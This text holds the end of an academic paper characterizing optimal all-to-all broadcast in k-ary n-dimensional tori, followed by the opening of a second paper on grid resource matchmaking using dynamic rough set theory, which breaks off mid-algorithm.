As in the proof of Lemma 1, the terms of Σ_{1≤j≤α} Σ_{j≤i≤α} n_i q^(i-j) can be organized in the following triangular matrix:

j = α:    n_α
j = α-1:  n_{α-1}    n_α q
j = α-2:  n_{α-2}    n_{α-1} q    n_α q^2
...
j = 1:    n_1    n_2 q    n_3 q^2    ...    n_α q^(α-1)

Summing the terms on the same diagonal we obtain:

Σ_{1≤j≤α} Σ_{j≤i≤α} n_i q^(i-j) = Σ_{1≤j≤α} n_j Σ_{0≤i≤j-1} q^i
= (1/(q-1)) Σ_{1≤j≤α} n_j (q^j - 1)
= (1/(q-1)) (Σ_{1≤j≤α} n_j q^j - Σ_{1≤j≤α} n_j)
= (1/(q-1)) (n - Σ_{0≤j≤α} n_j).

Similarly:

Σ_{1≤j≤β} Σ_{j≤i≤β} p_i q^(i-j) = (1/(q-1)) (p - Σ_{0≤j≤β} p_j),

from where we obtain the expected result.
V. CHARACTERIZATION OF THE OPTIMALITY

The aim of this section is to characterize the k-ary n-dimensional tori capable of optimal all-to-all broadcasts, such that data are routed on shortest paths, received only once by each node, and link loads are balanced.

According to these constraints, given the incremental construction of the torus, at step t of the broadcast each data item has to move in a descending construction order of the torus. This move can be realized according to several equivalent strategies. Such a strategy can be as simple as moving towards one of the nearest axes, or towards the farthest axis of the torus of smaller dimension. So let us choose the move-towards-one-of-the-nearest-axes strategy. This strategy partitions the nodes located at a given distance from the reference node into classes of nodes at distance 0, 1, ... from one or more nearest axes. The nodes belonging to a same class can also be partitioned into classes of nodes having, in this order, exactly n, n-1, ..., 1 identical coordinates.

As each piece of data located at a distance t from the reference node and having exactly p of its coordinates equal to v can be routed to the reference node only on the p axes from which it is at distance v, a necessary and sufficient condition for an optimal all-to-all broadcast is that, for any t, M(p,v)(n,k,t) must be divisible by the number of incoming axes of any node, which is equal to 2n.
Lemma 4: 2n does not divide N(p,v)(n,k,t).

Proof: Let q be a prime factor of 2n. From Proposition 2,

N(p,v)(n,k,n(v+1)-p) = 1 if k is odd, and 2^(n-p) otherwise.

Then:
- if q ≠ 2: exp(q, N(p,v)(n,k,t)) < exp(q, 2n);
- if q = 2: for k odd, N(p,0)(n,k,n-p) = 1 and again exp(q, N(p,v)(n,k,t)) < exp(q, 2n).
Lemma 5: A necessary and sufficient condition for 2n to divide G(p,v)(n,k) * C(n,p) is that:

Card{j≤β : Σ_{0≤i≤j-1} n_i q^i < Σ_{0≤i≤j-1} p_i q^i} ≥ Card{j≤α : Σ_{0≤i≤j-1} n_i q^i = 0} - exp(q, G(p,v)(n,k)) + exp(q, 2)

where α = log_q n and β = log_q p, for any prime factor q of n and p.

Proof: Let us recall that 2n divides G(p,v)(n,k) * C(n,p) means that for any prime factor q of 2n and of G(p,v)(n,k) * C(n,p) we have:

exp(q,2) + exp(q,n) ≤ exp(q, G(p,v)(n,k)) + exp(q, C(n,p)).

According to the expression of G(p,v)(n,k) from Proposition 2, two situations may arise.

Case 1: q ≠ 2. In this case we have exp(q,2) = 0 and exp(q, G(p,v)(n,k)) = 0. Then the above inequality becomes:

exp(q,n) ≤ exp(q, C(n,p)).

Let us recall that:

C(n,p)/n = (n-1)(n-2)...(n-p+1) / p!

and that, from Lemma 2:

exp(q, p!) = Σ_{1≤j≤1+log(p/q)} ⌊p/q^j⌋.

From the same lemma we also know that:

exp(q, (n-1)(n-2)...(n-p+1)) = Σ_{1≤j≤1+log((n-1)/q)} ⌊(n-1)/q^j⌋ - Σ_{1≤j≤1+log((n-p)/q)} ⌊(n-p)/q^j⌋.

Indeed, (n-1)(n-2)...(n-p+1) = (n-1)! / (n-p)!.

We know from Lemma 3 that:

C_1 = (1/(q-1))((n-1) - (Σ_{0≤j≤α} n_j - 1)) - Card{1≤j≤β : Σ_{0≤i≤j-1} n_i q^i < 1}
= (1/(q-1))((n-1) - (Σ_{0≤j≤α} n_j - 1)) - Card{1≤j≤β : Σ_{0≤i≤j-1} n_i q^i = 0}.

Similarly,

Σ_{1≤j≤1+log(p/q)} ⌊p/q^j⌋ = (1/(q-1))(p - Σ_{0≤j≤β} p_j).

By substituting each term by its value in the above divisibility condition, we obtain the expected relation, with the two last terms of the second member being equal to 0.

Case 2: q = 2. In this case, exp(q,2) = 1 and exp(q, G(p,v)(n,k)) = 0 or n-p. Then the divisibility condition becomes:

1 + exp(q,n) ≤ exp(q, G(p,v)(n,k)) + exp(q, C(n,p)).

By a reasoning similar to the one used for the case q ≠ 2, we obtain the desired relation.
At this point of our characterization, we have to specify the values of n which satisfy the condition of Lemma 5. Again this depends on the values of q.

Case 1: q ≠ 2. The question is to know whether there is n such that:

Card{j≤β : Σ_{0≤i≤j-1} n_i q^i < Σ_{0≤i≤j-1} p_i q^i} ≥ Card{j≤α : Σ_{0≤i≤j-1} n_i q^i = 0}

for any p < n.
The answer is definitively no: it suffices indeed to take p = q. Therefore the only values of n which are candidates are those which admit no prime factor other than q = 2, that is, the values of n which are powers of 2.

Case 2: q = 2. The question is to know whether there is n, equal to a power of 2 and strictly greater than any p, such that:

Card{j≤β : Σ_{0≤i≤j-1} n_i q^i < Σ_{0≤i≤j-1} p_i q^i} ≥ Card{j≤α : Σ_{0≤i≤j-1} n_i q^i = 0} - exp(q, G(p,v)(n,k)) + 1.

Two situations may arise according to the values of k.

Case 2.1: k is odd. As G(p,v)(n,k) may take different values, we just have to verify the relation for the maximum over all values of the second member of the inequality, which is attained for the minimum value of exp(q, G(p,v)(n,k)), that is n-p (corresponding to G(p,v)(n,k) = 2^(n-p)). Then we have:

Card{j≤β : Σ_{0≤i≤j-1} n_i 2^i < Σ_{0≤i≤j-1} p_i 2^i} ≥ Card{j≤α : Σ_{0≤i≤j-1} n_i 2^i = 0} - n + p + 1

where n = 2^r. Again, let us consider the maximum of the second member of the inequality over all values of p, attained for p = 2^r - 2. We obtain:

Card{j≤α : Σ_{0≤i≤j-1} n_i 2^i = 0} - n + p + 1 = r - 1,
Card{j≤β : Σ_{0≤i≤j-1} n_i 2^i < Σ_{0≤i≤j-1} p_i 2^i} = r - 1.

The inequality is then true.

Case 2.2: k is even. By the same reasoning as in the case where k is odd, we have to verify the following inequality:

Card{j≤β : Σ_{0≤i≤j-1} n_i 2^i < Σ_{0≤i≤j-1} p_i 2^i} ≥ Card{j≤α : Σ_{0≤i≤j-1} n_i 2^i = 0} + 1.

Again, from the case where q ≠ 2, this relation cannot be true: it suffices indeed to take p = 2.
We can summarize this discussion by the following characterization, which confirms the results obtained in [20] for k-ary 2-dimensional tori.

Theorem: A necessary and sufficient condition for an all-to-all broadcast to be optimal in a k-ary n-dimensional torus is that n is a power of 2 and k is odd.
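The characterization can be stated as a one-line predicate (a direct restatement of the theorem, for illustration):

```python
def admits_optimal_broadcast(n, k):
    """Condition of the theorem: an optimal all-to-all broadcast exists
    on a k-ary n-dimensional torus iff n is a power of 2 and k is odd."""
    is_power_of_two = n >= 1 and (n & (n - 1)) == 0
    return is_power_of_two and k % 2 == 1

# The 5-ary 2-dimensional torus of Fig. 2 qualifies;
# the 4-ary 2-dimensional torus of Fig. 3 does not.
print(admits_optimal_broadcast(2, 5), admits_optimal_broadcast(2, 4))  # -> True False
```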
VI. CONCLUSION

This paper devised the conditions for optimal all-to-all broadcast in k-ary n-dimensional tori. Such a broadcast has to satisfy routing on the shortest paths while balancing the link loads and minimizing the switching process at each node. The satisfaction of the link-load balance constraint imposes that the amount of data received on each link at each node has to be identical at each step of the broadcast; furthermore, there must exist a partition of the data received at each node such that the cardinality of each element of the partition is divisible by the number of links.

The paper proves that such a partition can be built only for k-ary n-dimensional tori for which k is odd and n is a power of 2. In any other case, any all-to-all broadcast algorithm is, at best, ε-optimal but not optimal.

The objectives of future work on this subject are twofold. On one side, it will concern the study of the best all-to-all broadcast when k is even or n is not a power of 2. On the other side, it will concern the study of the best suited switching processes in order to obtain efficient all-to-all broadcasts, whatever the arity and the dimension of the tori.
REFERENCES
[1] P.K. McKinley, Y.-J. Tsai, and D. Robinson, "Collective communication in wormhole-routed massively parallel computers", Computer, pp. 62-76, June 1993.
[2] D.K. Panda, "Issues in designing efficient and practical algorithms for collective communication on wormhole-routed systems", in Proc. ICPP Workshop on Challenges for Parallel Processing, 1995, p. 8.
[3] S. Hinrichs, C. Kosak, D.R. O'Hallaron, T.M. Stricker, and R. Take, "An architecture for optimal all-to-all personalised communication", in Proc. Symp. Parallel Algorithms and Architectures, 1994, p. 310.
[4] S.L. Johnsson and C.T. Ho, "Optimum broadcasting and personalised communication in hypercubes", IEEE Trans. Computers, vol. 38, pp. 1249-1268, Sept. 1989.
[5] D.M. Topkis, "All-to-all broadcast by flooding in communications networks", IEEE Trans. Computers, vol. 38, pp. 1330-1332, Sept. 1989.
[6] M.-S. Chen, J.-C. Chen, and P.S. Yu, "On general results for all-to-all broadcast", IEEE Trans. Parallel and Distributed Systems, 7(4), pp. 363-370, Sept. 1996.
[7] M.-S. Chen, K.-L. Wu, and P.S. Yu, "Efficient decentralised consensus protocols in distributed computing systems", in Proc. International Conference on Distributed Computing Systems, 1992, p. 426.
[8] T.V. Lakshman and A.K. Agrawala, "Efficient decentralised consensus protocols", IEEE Trans. Software Engineering, vol. 12, pp. 600-607, May 1986.
[9] S.B. Davidson, H. Garcia-Molina, and D. Skeen, "Consistency in partitioned networks", ACM Computing Surveys, vol. 17, no. 3, pp. 341-370, Sept. 1985.
[10] S. Rajasekaran, "k-k routing, k-k sorting and cut-through routing on the mesh", J. of Algorithms, vol. 19, pp. 361-382, March 1995.
[11] P.S. Rao and G. Mouney, "Data communications in parallel block-predictor-corrector methods for solving ODEs", LAAS-CNRS, France, Technical Report, 1995.
[12] D.S. Scott, "Efficient all-to-all communication patterns in hypercube and mesh topologies", in Proc. Sixth Conf. Distributed Memory Concurrent Computers, 1991, p. 398.
[13] R. Thakur and A. Choudhary, "All-to-all communication on meshes with wormhole routing", in Proc. Eighth Int. Parallel Processing Symp., 1994, p. 561.
[14] S.H. Bokhari and H. Berryman, "Complete exchange on a circuit switched mesh", in Proc. Scalable High Performance Computing Conf., 1992, p. 300.
[15] Y.-J. Suh and S. Yalamanchili, "All-to-all communication with minimum start-up costs in 2D/3D tori and meshes", IEEE Trans. Parallel and Distributed Systems, 9(7), pp. 442-458, May 1998.
[16] Y.-J. Suh and K.G. Shin, "All-to-all personalised communication in multidimensional torus and mesh networks", IEEE Trans. Parallel and Distributed Systems, 12(1), pp. 38-59, January 2001.
[17] Y. Yang and J. Wang, "Pipelined all-to-all broadcast in all-port meshes and tori", IEEE Trans. Computers, vol. 50, pp. 567-582, June 2001.
[18] Y. Yang and J. Wang, "Near-optimal all-to-all broadcast in multidimensional all-port meshes and tori", IEEE Trans. Parallel and Distributed Systems, 13(2), pp. 128-141, February 2002.
[19] S.M. Hedetniemi, S.T. Hedetniemi, and A. Liestman, "A survey of gossiping and broadcasting in communication networks", Networks, vol. 18, pp. 319-351, 1988.
[20] J.-P. Jung and I. Sakho, "A methodology for devising optimal all-port all-to-all broadcast algorithms in 2-dimensional tori", in Proc. of IEEE LCN, 2003, p. 558.
AUTHORS PROFILE

Jean-Pierre Jung received the PhD in computer science in 1983 at the University of Metz. From 1983 to 1994 he was Assistant Professor at the University of Metz. Since 1994 he has been Professor at the Department of Computer Science of the University of Metz, where he teaches script and system programming. The research area of Prof. Jung concerns CAD and parallel and distributed systems.

Ibrahima Sakho received the PhD in applied mathematics in 1987 at the Institut National Polytechnique de Grenoble. From 1987 to 1992 he was at the Institut des Mathématiques Appliquées de Grenoble, where he worked on the European supercomputer project Supernode; from 1992 to 1997 he was at the École des Mines de St-Étienne, where he was the head of the Parallel and Distributed Systems team. Since 1997 he has been Professor at the University of Metz, where he teaches computer architecture, parallel and distributed systems, and decision making under uncertainty. The research of Prof. Sakho addresses the design of parallel and distributed algorithms and the algorithmics of the control of these systems.
Resource Matchmaking Algorithm using Dynamic
Rough Set in Grid Environment
Iraj Ataollahi
Computer Engineering Department, Iran University of Science and Technology
Tehran, Iran
ir_ataollahi@mail.iust.ac.ir
Morteza Analoui
Computer Engineering Department, Iran University of Science and Technology
Tehran, Iran
analoui@iust.ac.ir
Abstract— The Grid environment is a service-oriented infrastructure in which many heterogeneous resources participate to provide high performance computation. One of the big issues in the grid environment is the vagueness and uncertainty between advertised resources and requested resources. Furthermore, in an environment such as the grid, dynamicity is considered a crucial issue which must be dealt with. Classical rough set theory has been used to deal with uncertainty and vagueness, but it can only be used on static systems and cannot support dynamicity in a system. In this work we propose a solution, called Dynamic Rough Set Resource Discovery (DRSRD), for dealing with cases of vagueness and uncertainty, based on dynamic rough set theory, which considers the dynamic features of this environment. In this approach, requested resource properties carry a weight as priority, according to which the resource matchmaking and ranking process is done. We also report the results obtained from simulation in the GridSim simulator. A comparison has been made between DRSRD, the classical rough set theory based algorithm, and the UDDI and OWL-S combined algorithm. DRSRD shows much better precision for cases with vagueness and uncertainty in a dynamic system such as the grid than the classical rough set theory based algorithm and the UDDI and OWL-S combined algorithm.
Keywords- Grid; Rough set; Dynamic rough set; Resource discovery; Ontology; UDDI; OWL-S
I. INTRODUCTION
Nowadays, the Grid is considered a service-oriented computing infrastructure [1]. The Open Grid Services Architecture (OGSA) [2], which has been promoted by the Global Grid Forum, has been used for dealing with the service-oriented problem [3].

Many resources such as workstations, clusters, and mainframes with various properties such as main memory, CPU speed, bandwidth, virtual memory, hard disk, operating system, CPU vendor, number of CPU elements, etc. are joining and leaving the grid environment. On the other hand, many users want to use these resources to run their jobs with different requirements. But there are always differences between what a user has requested and what has been registered in a grid GIS. To solve this vagueness and uncertainty we use rough set theory, proposed by Z. Pawlak in 1982 [4], which has been used in vast areas of computer science such as data mining, pattern recognition, machine learning, knowledge acquisition, etc. [5].
One of the first methods that can be used for service discovery is UDDI, which is used for web service publication and discovery. The current web service discovery mechanism is based on the UDDI standard [6]. In UDDI, XML is used to describe data in business services. UDDI processes search queries according to keywords and classification information. There are limitations to the discovery mechanism of UDDI. Firstly, a machine can read XML data, but it cannot understand it: different query keywords may be semantically equivalent, but since UDDI cannot infer any information from keywords or tModels, it can easily make mistakes. Secondly, search by keywords and taxonomy is not suitable for web service discovery. Furthermore, UDDI does not support search by service capabilities and other properties [7]. This makes the UDDI search method a low precision method [6].
With the advent of the semantic web, services can be annotated with metadata to enhance service discovery. One of the earliest efforts to add semantic information is DAML-S [8], which uses semantic information for discovering web services and ontological descriptions to express web service capacity and character.

OWL-S is an OWL [9] based ontology for encoding properties of web services. OWL-S technology is used to facilitate service annotation and matching. The OWL-S ontology defines a service profile for encoding a service description, a service model for specifying the behavior of a service, and a service grounding for how to invoke the service. Actually, by using a domain ontology described in OWL, built with special software such as Protégé [10], a service discovery process involves a matching between the profile of a service advertisement and the profile of a service request. The service profile describes functional properties such as inputs, outputs, preconditions, and effects, and non-functional properties such as service name, service category, and aspects related to the quality of service.

In [11] a quantification standard for semantic service matching has been presented that modifies the classical matching algorithm based on OWL-S; the matching algorithm uses the quantification standard of service matching and OWL-S. In [12] a service composition algorithm constructs a mathematical model and converts it to the shortest path problem in order to find the process that can satisfy the customer need under the best conditions.
In [7] an approach has been developed for integrating semantic features into UDDI. The approach uses a semantic matchmaker that imports OWL-S based semantic markups and service properties into UDDI. The combination of OWL-S and UDDI shows that there can be a service discovery that supports web service expression while UDDI is used. The matchmaker, therefore, enables UDDI to store semantic information of web services and to process service search queries based on the semantic similarity of web service properties [7].

The above-mentioned methods facilitate service discovery in some way. However, when matching service advertisements with service requests, these methods assume that service advertisements and service requests use consistent properties to describe the relevant services. But for a system such as the Grid, with a large number of resources and users which have their own predefined properties to describe services, it cannot be assumed that service advertisements and service requests use consistent properties to describe services. In other words, some properties may be used in a service advertisement that are not used by a service request. So, an approach must be taken into consideration to deal with the uncertainty of service properties when matching service advertisements with service requests. Rough set theory is a mathematical theory which deals with uncertainty and vagueness [13]. In addition to the use of rough set theory, we use a service ontology to describe resources in a classified form. This ontology has been made according to the Karlsruhe ontology model [10].

The remainder of this paper is organized as follows. Part II is a description of rough set theory, part III is a description of the algorithm implemented and used in this paper, part IV is a comparison of our algorithm with the UDDI and OWL-S combined model proposed in [14] and the rough set based matchmaking algorithm [18], and finally part V is the conclusion and future works.
II. RELATED WORKS

While the grid environment moves towards a service-oriented computing infrastructure, service discovery is becoming a vital part of this environment. One of the earliest methods for service publication and discovery is UDDI, which only supports keyword matches and does not support any semantics. DAML-S was the earliest to add semantic information for discovering web services [15]. DAML-S offers enough semantic information for expressing web service capacity and character with an ontological description of web services. In the past few years, a great number of studies have been carried out on the basis of OWL-S, such as semantic expression service bundling [16], ontology-based service matching [16], and OWL-S and UDDI combination [14]. In [17] a metric is proposed to measure the similarity of semantic services annotated with an OWL ontology. Similarity is calculated by defining the intrinsic information value of a service description based on the inferencibility of each of the OWL constructs. All the above methods do not support uncertainty in properties. Rough set theory is used for dealing with vagueness and missing data in a large variety of domains. So, compared with the work mentioned above, rough set theory can tolerate uncertain properties in matching resources. In [18] we have proposed a rough set based algorithm to deal with uncertainty and vagueness. In this paper, our algorithm works in two steps. The first step is dependent property reduction, which removes dependent properties. The second step is matchmaking, which matches and ranks resources according to the requested resource.
III. CLASSICAL ROUGH SET THEORY

Rough set theory, proposed by Pawlak in 1982, has been proved to be a good mathematical tool to describe and model uncertainty and imprecision. It has been widely applied in artificial intelligence, pattern recognition, data mining, fault diagnostics, etc. [19]. There are many advantages of rough set theory; for example, no preliminary or additional information is needed and only the facts in the data are considered.

Fig. 1 [18] shows that rough set theory is based on the concept of an upper and a lower approximation of a set. For a given set X, the yellow grids represent the upper approximation of X, the green grids represent the lower approximation of X, and the black line represents the boundary region of X.

Let:
• U: a set of N registered resources, U = {u1, u2, ..., uN}, N ≥ 1.
• P: a set of M properties used to describe the N registered resources of the set U, P = {p1, p2, ..., pM}, M ≥ 2.
• Q: a set of K registered resource properties relevant to a resource request R in terms of the resource ontology, whose irrelevant properties have been removed, Q = {q1, q2, ..., qK}, K ≥ 1, and Q is a subset of P.
• R: a set of L requested resource properties with their weights, R = {(r1,w1), (r2,w2), ..., (rL,wL)}, L ≥ 1.

Figure 1. Approximation in rough set theory
According to rough set theory, for a given set X we have:

Q̲X = {x | [x]_Q ⊆ X}    (1)
Q̄X = {x | [x]_Q ∩ X ≠ ∅}    (2)

in which Q̲X is the lower approximation and Q̄X is the upper approximation of X in terms of the property set Q, with X ⊆ U and Q ⊆ P. So for a property q ∈ Q, we can say that:
• ∀x ∈ Q̲X, x definitely is a member of X and definitely has property q;
• ∀x ∈ Q̄X, x probably is a member of X and probably has property q;
• ∀x ∈ U - Q̄X, x absolutely is not a member of X and absolutely does not have property q.

The most important part of rough set theory is attribute reduction. Some attributes are dependent on other attributes in the attribute set, so they need not be considered in the matching phase. According to rough set theory, we have:

POS_C(D) = ∪_{X ∈ U/D} C̲X    (3)
γ(C,D) = |POS_C(D)| / |U| = α    (4)

in which C and D are subsets of the property set P. As shown in [13], D totally depends on C if α = 1, or D partially depends on C (in a degree of α) if α < 1.

Since existing works need to find an exact match between requested resources and registered resources, it is difficult to find a match. By using rough set theory, the need for an exact match is removed.
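The lower and upper approximations (1) and (2) can be computed directly from the equivalence classes [x]_Q. The sketch below is illustrative only; the resource table and its attribute values are hypothetical, not the authors' data set:

```python
def equivalence_classes(universe, attrs, value):
    """Partition the universe into classes [x]_Q of objects that agree
    on every attribute in `attrs`; value(x, a) gives x's value for a."""
    classes = {}
    for x in universe:
        classes.setdefault(tuple(value(x, a) for a in attrs), set()).add(x)
    return list(classes.values())

def lower_upper(universe, attrs, value, X):
    """Lower approximation {x : [x]_Q subset of X} and upper
    approximation {x : [x]_Q intersects X} of X w.r.t. attrs."""
    lower, upper = set(), set()
    for cls in equivalence_classes(universe, attrs, value):
        if cls <= X:
            lower |= cls
        if cls & X:
            upper |= cls
    return lower, upper

# Hypothetical registered resources described by (os, number of CPUs).
table = {"u1": ("linux", 2), "u2": ("linux", 2),
         "u3": ("linux", 4), "u4": ("win", 4)}
value = lambda x, a: table[x][a]
low, up = lower_upper(set(table), [0, 1], value, {"u1", "u3"})
print(sorted(low), sorted(up))  # -> ['u3'] ['u1', 'u2', 'u3']
```

Here u3 is the only resource certainly in the target set (its class {u3} lies inside X), while u1 and u2 are indistinguishable under Q, so both fall into the upper approximation.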
IV. DYNAMIC ROUGH SET THEORY

Although rough set theory is used in various areas of research such as data mining, pattern recognition, decision making, and expert systems, it is suitable for static knowledge and data. In fact, in classical rough set theory, the subset X of the universal set U is a static set, without consideration of the dynamic features it can have. In the real world, most information systems have dynamic features, so that the rate of appearance and disappearance of entities in these systems is high. Whereas Pawlak's rough set theory can only deal with static information systems, using a dynamic method to deal with uncertainty and to process the information system is more efficient.

By using dynamic rough set theory, considering the dynamic features of an information system becomes possible. Dynamic rough set theory uses outward and inward transfer parameters to expand or contract the set X of classical rough set theory.
According to [20], dynamic rough set theory is defined as follows.

Suppose A = (U, P) is an information system, T ⊆ P, and X ⊆ U. For any x ∈ U, we have:

ρ⁻_(X,T)(x) = |[x]_T − X| / |[x]_T|,  as x ∈ X    (5)

ρ⁺_(X,T)(x) = 1 − |[x]_T − X| / |[x]_T|,  as x ∈ ~X    (6)

where [x]_T is the equivalence class of x under T and ~X denotes U − X. ρ⁻_(X,T)(x) is called the outward transfer coefficient and ρ⁺_(X,T)(x) is called the inward transfer coefficient of element x about T. In real computation, the outward and inward transfer standards are chosen as constant amounts: d⁻_T(X) ∈ [0,1] and d⁺_T(X) ∈ [0,1] are the outward transfer standard and the inward transfer standard of the elements of X about T, respectively.

The inflated dynamic main set of X is defined as below:

M⁺_T(X) = { x | x ∈ ~X, d⁺_T(X) ≤ ρ⁺_(X,T)(x) < 1 }    (7)

and the inflated dynamic assistant set is defined as:

A⁺_T(X) = { x | x ∈ ~X, 0 ≤ ρ⁺_(X,T)(x) < d⁺_T(X) }    (8)

X⁺_T is called the inflated dynamic set of X about T and is defined as:

X⁺_T = X ∪ M⁺_T(X)    (9)

Formulas (5)-(9) show that we can expand X according to T. We can also contract X according to T; for this reason we have:

M⁻_T(X) = { x | x ∈ X, d⁻_T(X) ≤ ρ⁻_(X,T)(x) < 1 }    (10)

in which M⁻_T(X) is defined as the contracted dynamic main set of X about T, and the contracted dynamic assistant set is defined as:

A⁻_T(X) = { x | x ∈ X, 0 ≤ ρ⁻_(X,T)(x) < d⁻_T(X) }    (11)

X⁻_T, called the contracted dynamic set, is defined as:

X⁻_T = X − M⁻_T(X)    (12)

According to the above, we can both expand and contract X. Suppose we have T, T′ ⊆ P; the two-direction dynamic set of X according to T and T′ is defined as:

X*_(T,T′) = (X − M⁻_T′(X)) ∪ M⁺_T(X)    (13)

Suppose Q ⊆ P; we can compute the upper and lower approximations of X*_(T,T′) using equations (1, 2), so that we have:

Q̲(X*_(T,T′)) = { x | x ∈ U, [x]_Q ⊆ X*_(T,T′) }    (14)

Q̄(X*_(T,T′)) = { x | x ∈ U, [x]_Q ∩ X*_(T,T′) ≠ ∅ }    (15)

Q̲(X*_(T,T′)) and Q̄(X*_(T,T′)) are called the two-direction transfer D-lower approximation set and the two-direction transfer D-upper approximation set of X, respectively. In fact, according to M⁺_T(X) we should increase the resources (X) which can have an opportunity of selection according to the attribute set T, while M⁻_T′(X) indicates that according to the attribute set T′ we should decrease X.
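The transfer coefficients and the two-direction dynamic set above can be sketched as follows. The universe, the equivalence classes, and the thresholds are invented for illustration and are not the paper's data.

```python
# Illustrative toy example of the transfer coefficients (5)-(6) and the
# two-direction dynamic set (13). Equivalence classes [x]_T are supplied
# directly as precomputed dicts; all data here is assumed, not the paper's.

def rho_out(x, X, eq_class):
    """Outward transfer coefficient (5), for x in X."""
    cls = eq_class[x]
    return len(cls - X) / len(cls)

def rho_in(x, X, eq_class):
    """Inward transfer coefficient (6), for x outside X."""
    cls = eq_class[x]
    return 1 - len(cls - X) / len(cls)

def two_direction_set(U, X, eq_T, eq_Tp, d_in, d_out):
    """X*_(T,T') = (X - M-_T'(X)) | M+_T(X), equations (7), (10), (13)."""
    M_plus = {x for x in U - X if d_in <= rho_in(x, X, eq_T) < 1}
    M_minus = {x for x in X if d_out <= rho_out(x, X, eq_Tp) < 1}
    return (X - M_minus) | M_plus

U = {1, 2, 3, 4, 5, 6}
X = {1, 2, 3}
# [x]_T: classes under the high-priority attributes T.
eq_T = {1: {1, 2}, 2: {1, 2}, 3: {3, 4}, 4: {3, 4}, 5: {5, 6}, 6: {5, 6}}
# [x]_T': classes under the low-priority attributes T'.
eq_Tp = {1: {1}, 2: {2, 5}, 3: {3, 6}, 4: {4}, 5: {2, 5}, 6: {3, 6}}
result = two_direction_set(U, X, eq_T, eq_Tp, d_in=0.5, d_out=0.5)
# Element 4 is pulled in (half of its T-class already lies in X), while
# 2 and 3 are pushed out by T': result == {1, 4}.
```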
Q̲(X*_(T,T′)) indicates the objects of the optimized candidate set, which can be considered as a candidate set for the matchmaking process. So in the matchmaking phase we only need to search the D-lower approximation set Q̲(X*_(T,T′)) in order to select the resources which satisfy the requested service.
In this work, we can also determine the priority of each requested service property. If the properties in T play an important role, i.e. their priority factor is high, we can decrease d⁺_T; this means that we expand the candidate set X according to the property set T. When properties play a less important role, i.e. their priority factor is low, we can decrease d⁻_T′ in order to contract the candidate set.
V. RESOURCE DISCOVERY
The GridSim simulator has been used to simulate the Dynamic Rough Set Resource Discovery (DRSRD) algorithm. As shown in Fig. 2, the user sends a service request to the GridSim Broker; the Broker forwards the request to the GIS, which can access the Advertised Resource Repository and the ontology template in order to get the resources which satisfy the requested service. The GIS has two components for finding resources that satisfy the requested service. The first component is Candidates Optimization, which uses dynamic rough set theory to determine the optimum set of candidate resources. The user defines a priority factor, called Wi, for each of the requested service properties in order to determine their priority. The Candidates Optimization component determines the candidate resource set according to the priority of the requested service properties.
Figure 2. Algorithm outline
The second component is the Matchmaking component, which runs the matchmaking algorithm on the candidate resource set obtained from the Candidates Optimization component.
For describing resource properties, we have used a resource ontology template based on the Karlsruhe ontology model [10]. The resource ontology template, as shown in Fig. 3 [23], has been created by considering the most common computing resources in the Grid. The concepts of these resources have been defined using relations and properties, so that the characteristics of any resource can be described by its properties. For using the ontology template in GridSim, which is a Java-based simulator, we have used the protégé-OWL API, a Java-based API, to create and modify the ontology dynamically. In this section we describe the Candidates Optimization component and the Matchmaking component.
Figure 3. Ontology template
According to the method proposed in [14], there are four relations between pR and pA, in which pR and pA are respectively a property of the resource request and a property of the registered resource. These four relations are as follows:

• Exact match: pR and pA are equivalent, or pR is a subclass of pA.
• Plug-in match: pA subsumes pR.
• Subsume match: pR subsumes pA.
• No match: no subsumption relation between pR and pA.
Each property in the advertised resource property set will be compared to all of the properties in the resource request property set. Each property in the advertised resources that has no match relationship with any of the properties in the resource request will be treated as an irrelevant property and
must be marked up. This step is repeated until all the properties of the registered resources have been checked. The marked-up properties are not used in the Candidates Optimization component.

After the reduction of the irrelevant properties, the remaining properties are sent to the Candidates Optimization component in order to optimize the candidate set.
A. Candidates Optimization
The most important aim of dynamic rough set theory is to deal with the vagueness and uncertainty in a knowledge system which changes dynamically. For a system such as the Grid, whose resources can join or leave the system randomly, using dynamic rough set theory is more efficient than classical rough set theory.
The user sends its service request to the Broker. In this request, each of the requested service properties has a weight Wi. The Broker forwards this request to the Grid Information Service (GIS) in order to find the best resources which satisfy the requested service. After the GIS gets the request, it classifies the requested properties according to their weights. According to Section III, the set R is the requested resource property set, and the property set T ⊆ R is defined as below:

T = { (r_i, w_i) | (r_i, w_i) ∈ R and w_i ≥ 0.5 },  1 ≤ i ≤ L1.

In fact, the set T contains the properties with a priority factor (weight) of at least 0.5.
As mentioned in Section IV, the candidate set can be expanded according to the property set T. According to the weights of the requested service properties, we define the inward transfer standard d⁺_T(X) as follows:

d⁺_T(X) = ( Σ_{i=1}^{L1} w_i ) / L1,  in which t_i = (r_i, w_i) ∈ T.    (16)
The property set T′ ⊆ R is defined as the set of properties whose weight is less than 0.5, so T′ is defined as:

T′ = { (r_i, w_i) | (r_i, w_i) ∈ R and w_i < 0.5 },  1 ≤ i ≤ L2.

The outward transfer standard d⁻_T′(X) is defined as below:

d⁻_T′(X) = ( Σ_{i=1}^{L2} w_i ) / L2,  in which t_i = (r_i, w_i) ∈ T′.    (17)
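Assuming that each transfer standard in (16) and (17) is the mean weight of its property group (our reading of the garbled formulas), the weight split can be sketched as follows; the property names and weights are invented:

```python
# Sketch of the weight split and transfer standards of (16)-(17).
# ASSUMPTION: each standard is the mean weight of its group; property
# names and weights below are made up for illustration.

def split_by_weight(R, threshold=0.5):
    """T holds properties with weight >= threshold, T' the rest."""
    T = [(r, w) for r, w in R if w >= threshold]
    T_prime = [(r, w) for r, w in R if w < threshold]
    return T, T_prime

def transfer_standard(props):
    """d = (sum of weights) / (number of properties), assumed from (16)/(17)."""
    return sum(w for _, w in props) / len(props) if props else 0.0

R = [("cpu_speed", 0.9), ("memory", 0.7), ("os", 0.4), ("bandwidth", 0.2)]
T, T_prime = split_by_weight(R)
d_in = transfer_standard(T)         # inward standard  d+_T(X), approx. 0.8
d_out = transfer_standard(T_prime)  # outward standard d-_T'(X), approx. 0.3
```

A low d_out removes borderline resources aggressively, while a low d_in admits more of them, matching the priority discussion above.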
The candidate set X is defined as the set of resources with the maximum number of non-empty properties with respect to the requested resource properties, and ~X is defined as all the resources in the universal set U which are not contained in X.
The Candidates Optimization algorithm is shown in Fig. 4. The algorithm computes the optimized candidate set in four steps.
Input: requested property set R = {(r1, w1), (r2, w2), …, (rL, wL)}.
Input: candidate set X.
Output: optimized candidate set.
I: inflated dynamic main set of X about T.
C: contracted dynamic main set of X about T′.
X*: two-direction dynamic set of X according to T and T′.
X̲*: lower approximation of X* according to the requested resource properties R.

Step 1:
  Compute d⁺_T(X) and d⁻_T′(X).
Step 2:
